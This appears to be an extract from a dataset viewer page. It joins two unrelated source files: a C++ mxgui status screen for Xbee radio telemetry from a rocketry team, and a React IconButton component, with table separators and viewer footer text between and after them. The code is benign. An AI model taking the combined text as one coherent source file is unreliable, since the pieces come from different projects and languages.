/* Copyright (c) 2021 Skyward Experimental Rocketry
* Author: <NAME>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
#pragma once
#include <mxgui/display.h>
#include <cstdint>
#include <string>
#include <cstring>
#include "utils/testutils/ThroughputCalculator.h"
#include "../XbeeTestData.h"
#include "logger/Logger.h"
#include "utils/gui/GridLayout.h"
#include "utils/gui/OptionView.h"
#include "utils/gui/TextView.h"
#include "utils/gui/VerticalLayout.h"
using std::to_string;
/**
* @brief Converts tick in milliseconds to the HH:MM:SS format
*/
std::string tickToHMS(long long tick)
{
char buf[15];
int h = tick / (1000 * 3600);
tick -= h * (1000 * 3600);
int m = tick / (1000 * 60);
tick -= m * (1000 * 60);
int s = tick/1000;
snprintf(buf, 15, "%02d:%02d:%02d", h, m, s);
return string(buf);
}
struct StatusScreen
{
XbeeConfig config;
StatusScreen()
{
title.setFont(mxgui::miscFixedBold);
title.setTextColor(mxgui::black);
title.setBackgroundColor(mxgui::green);
title.setAlignment(HorizAlignment::CENTER, VertAlignment::CENTER);
tv_log_status.setFont(mxgui::miscFixedBold);
tv_log_status.setTextColor(mxgui::white);
tv_log_status.setBackgroundColor(mxgui::red);
tv_log_status.setAlignment(HorizAlignment::CENTER,
VertAlignment::CENTER);
grid_title.setCell(&title, 0, 0);
grid_title.setCell(&tv_log_status, 0, 1);
grid_config.setCell(&tv_cfg_txt_tx_enabled, 0, 0);
grid_config.setCell(&tv_cfg_tx_enabled, 0, 1);
grid_config.setCell(&tv_cfg_txt_pkt_size, 0, 2);
grid_config.setCell(&tv_cfg_pkt_size, 0, 3);
grid_config.setCell(&tv_cfg_txt_snd_interval, 1, 0);
grid_config.setCell(&tv_cfg_snd_interval, 1, 1);
grid_config.setCell(&tv_cfg_txt_freq_hop, 1, 2);
grid_config.setCell(&tv_cfg_freq_hop, 1, 3);
grid_config.setCell(&tv_cfg_txt_data_rate, 2, 0);
grid_config.setCell(&tv_cfg_data_rate, 2, 1);
tv_log_title.setTextColor(mxgui::blue);
grid_log_status.setCell(&tv_log_title, 0, 0);
grid_log_status.setCell(&tv_log_txt_buf_written, 1, 0);
grid_log_status.setCell(&tv_log_buf_written, 1, 1);
grid_log_status.setCell(&tv_log_txt_buf_ttw, 1, 2);
grid_log_status.setCell(&tv_log_buf_ttw, 1, 3);
grid_log_status.setCell(&tv_log_txt_buf_dropped, 2, 0);
grid_log_status.setCell(&tv_log_buf_dropped, 2, 1);
grid_log_status.setCell(&tv_log_txt_buf_failed, 2, 2);
grid_log_status.setCell(&tv_log_buf_failed, 2, 3);
tv_tx_title.setTextColor(mxgui::blue);
grid_data.setCell(&tv_tx_title, 0, 0);
grid_data.setCell(&tv_tx_txt_num_pkt, 1, 0);
grid_data.setCell(&tv_tx_num_pkt, 1, 1);
grid_data.setCell(&tv_tx_txt_num_fail, 2, 0);
grid_data.setCell(&tv_tx_num_fail, 2, 1);
grid_data.setCell(&tv_tx_txt_pps, 3, 0);
grid_data.setCell(&tv_tx_pps, 3, 1);
grid_data.setCell(&tv_tx_txt_TTS, 4, 0);
grid_data.setCell(&tv_tx_tts, 4, 1);
grid_data.setCell(&tv_tx_txt_last_status, 5, 0);
grid_data.setCell(&tv_tx_last_status, 5, 1);
grid_data.setCell(&tv_tx_txt_last_err, 6, 0);
grid_data.setCell(&tv_tx_last_err, 6, 1);
tv_rx_title.setTextColor(mxgui::blue);
grid_data.setCell(&tv_rx_title, 0, 2);
grid_data.setCell(&tv_rx_txt_num_pkt, 1, 2);
grid_data.setCell(&tv_rx_num_pkt, 1, 3);
grid_data.setCell(&tv_rx_txt_num_fail, 2, 2);
grid_data.setCell(&tv_rx_num_fail, 2, 3);
grid_data.setCell(&tv_rx_txt_lost, 3, 2);
grid_data.setCell(&tv_rx_lost, 3, 3);
grid_data.setCell(&tv_rx_txt_RSSI, 4, 2);
grid_data.setCell(&tv_rx_RSSI, 4, 3);
grid_data.setCell(&tv_rx_txt_data_rate, 5, 2);
grid_data.setCell(&tv_rx_data_rate, 5, 3);
grid_data.setCell(&tv_rx_txt_pps, 6, 2);
grid_data.setCell(&tv_rx_pps, 6, 3);
grid_data.setCell(&tv_rx_txt_time_since_last_rx, 7, 2);
grid_data.setCell(&tv_rx_time_since_last_rx, 7, 3);
btn_mark.setSelectable(true);
btn_mark.setAlignment(HorizAlignment::CENTER,
VertAlignment::CENTER);
btn_mark.setBackgroundColor(mxgui::darkGrey);
btn_stop.setSelectable(true);
btn_stop.setAlignment(HorizAlignment::CENTER, VertAlignment::CENTER);
btn_stop.setBackgroundColor(mxgui::darkGrey);
grid_buttons.setCell(&btn_mark, 0);
grid_buttons.setCell(&btn_stop, 1);
grid_buttons.setDrawBorder(true);
root.addView(&grid_title, 0.8);
root.addView(&grid_config, 1.5);
root.addView(&grid_log_status, 1.5);
root.addView(&grid_data, 5);
root.addView(&grid_buttons, 1);
}
void updateConfig(XbeeConfig cfg)
{
// Update GUI with selected config values
tv_cfg_tx_enabled.setText(cfg.tx_enabled ? "Enabled" : "Disabled");
tv_cfg_pkt_size.setText(std::to_string(cfg.packet_size));
tv_cfg_snd_interval.setText(cfg.send_interval == 0
? "Cont"
: std::to_string(cfg.send_interval));
tv_cfg_freq_hop.setText(cfg.freq_hop ? "Enabled" : "Disabled");
tv_cfg_data_rate.setText(cfg.data_rate_80k ? "80 kbps" : "10 kbps");
}
void updateLogStatus(Logger& logger)
{
LogStats stats = logger.getLogStats();
if (logger.getLogNumber() >= 0)
{
string log_name = logger.getFileName(logger.getLogNumber());
tv_log_status.setText(log_name);
tv_log_status.setTextColor(mxgui::black);
tv_log_status.setBackgroundColor(mxgui::green);
}
else
{
tv_log_status.setText("SD ERR");
tv_log_status.setTextColor(mxgui::white);
tv_log_status.setBackgroundColor(mxgui::red);
}
tv_log_buf_dropped.setText(to_string(stats.statDroppedSamples));
if (stats.statDroppedSamples > 0)
{
tv_log_buf_dropped.setBackgroundColor(mxgui::red);
}
tv_log_buf_failed.setText(to_string(stats.statWriteFailed) + " (" +
to_string(stats.statWriteError) + ")");
if (stats.statWriteError != 0)
{
tv_log_buf_failed.setBackgroundColor(mxgui::red);
}
tv_log_buf_written.setText(to_string(stats.statBufferWritten));
tv_log_buf_ttw.setText(to_string(stats.statWriteTime) + " ms");
}
void updateXbeeStatus(DataRateResult res_rcv, DataRateResult res_snd,
TxData txd, RxData rxd, Xbee::XbeeStatus xbee_status)
{
char str_buf[30];
tv_tx_num_pkt.setText(
to_string(txd.tx_success_counter + txd.tx_fail_counter));
tv_tx_num_fail.setText(to_string(txd.tx_fail_counter));
snprintf(str_buf, 30, "%.1f pkt/s", res_snd.packets_per_second);
tv_tx_pps.setText(str_buf);
tv_tx_tts.setText(to_string(txd.time_to_send) + " ms");
tv_tx_last_status.setText(to_string(xbee_status.last_tx_status));
tv_tx_last_err.setText(to_string(xbee_status.last_tx_status_error));
tv_rx_num_pkt.setText(to_string(rxd.rcv_count));
tv_rx_num_fail.setText(to_string(rxd.rcv_errors));
// tv_rx_num_fail.setText(to_string(int_counter) + " " +
// to_string(GpioATTN::value()));
tv_rx_lost.setText(to_string(rxd.packets_lost));
tv_rx_RSSI.setText(to_string(rxd.RSSI) + " dB");
snprintf(str_buf, 30, "%.0f B/s", res_rcv.data_rate);
tv_rx_data_rate.setText(str_buf);
snprintf(str_buf, 30, "%.1f pkt/s", res_rcv.packets_per_second);
tv_rx_pps.setText(str_buf);
tv_rx_time_since_last_rx.setText(tickToHMS(miosix::getTick() - rxd.last_packet_timestamp));
}
VerticalLayout root{10};
TextView tv_cfg_tx_enabled{"Disabled"};
TextView tv_cfg_pkt_size{"256 B"};
TextView tv_cfg_snd_interval{"Cont"};
TextView tv_cfg_freq_hop{"Enabled"};
TextView tv_cfg_data_rate{"10 kbps"};
TextView tv_log_status{"SD ERR"};
TextView tv_log_buf_dropped{"0"};
TextView tv_log_buf_failed{"0 (0)"};
TextView tv_log_buf_written{"0"};
TextView tv_log_buf_ttw{"0 ms"};
TextView tv_tx_num_pkt{"0"};
TextView tv_tx_num_fail{"0"};
TextView tv_tx_pps{"0 pkt/s"};
TextView tv_tx_tts{"- ms"};
TextView tv_tx_last_status{"0"};
TextView tv_tx_last_err{"0"};
TextView tv_rx_num_pkt{"0"};
TextView tv_rx_num_fail{"0"};
TextView tv_rx_lost{"0"};
TextView tv_rx_RSSI{"-40 dB"};
TextView tv_rx_data_rate{"0 B/s"};
TextView tv_rx_pps{"0 pkt/s"};
TextView tv_rx_time_since_last_rx{"00:00:00"};
TextView btn_mark{"Mark Log (1)"};
TextView btn_stop{"Stop"};
private:
TextView title{"Xbee Status"};
GridLayout grid_title{1, 2};
GridLayout grid_config{3, 4};
GridLayout grid_buttons{1, 2};
GridLayout grid_log_status{3, 4};
GridLayout grid_data{8, 4};
TextView tv_cfg_txt_tx_enabled{"TX"};
TextView tv_cfg_txt_pkt_size{"Pkt size"};
TextView tv_cfg_txt_snd_interval{"Interv"};
TextView tv_cfg_txt_freq_hop{"Freq hop"};
TextView tv_cfg_txt_data_rate{"Data rate"};
TextView tv_log_title{"LOG"};
TextView tv_log_txt_buf_dropped{"Buf drops"};
TextView tv_log_txt_buf_failed{"Wrt fails"};
TextView tv_log_txt_buf_written{"Wrt succ"};
TextView tv_log_txt_buf_ttw{"TTW"};
TextView tv_tx_title{"TX"};
TextView tv_tx_txt_num_pkt{"Sent"};
TextView tv_tx_txt_num_fail{"Fails"};
TextView tv_tx_txt_pps{"PPS"};
TextView tv_tx_txt_TTS{"TTS"};
TextView tv_tx_txt_last_status{"Status"};
TextView tv_tx_txt_last_err{"Last err"};
TextView tv_rx_title{"RX"};
TextView tv_rx_txt_num_pkt{"Recv"};
TextView tv_rx_txt_num_fail{"Fails"};
TextView tv_rx_txt_lost{"Lost"};
TextView tv_rx_txt_RSSI{"RSSI"};
TextView tv_rx_txt_data_rate{"DR"};
TextView tv_rx_txt_pps{"PPS"};
TextView tv_rx_txt_time_since_last_rx{"No RX dt"};
}; |
import clsx from 'clsx';
import { IconBaseProps } from 'react-icons';
import { Loader } from '../Loader';
import styles from './IconButton.module.scss';
export type IconBtnType = 'standard' | 'primary' | 'info' | 'error';
interface Props {
icon: React.ComponentType<IconBaseProps>;
btnType?: IconBtnType;
onClick: () => void;
loading?: boolean;
}
const IconButton = ({ icon: Icon, btnType = 'standard', onClick, loading = false }: Props) => {
return (
<div className={clsx(styles.icon_button, styles[btnType])} onClick={onClick}>
{loading ? <Loader /> : <Icon size={20} />}
</div>
);
};
export default IconButton;
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.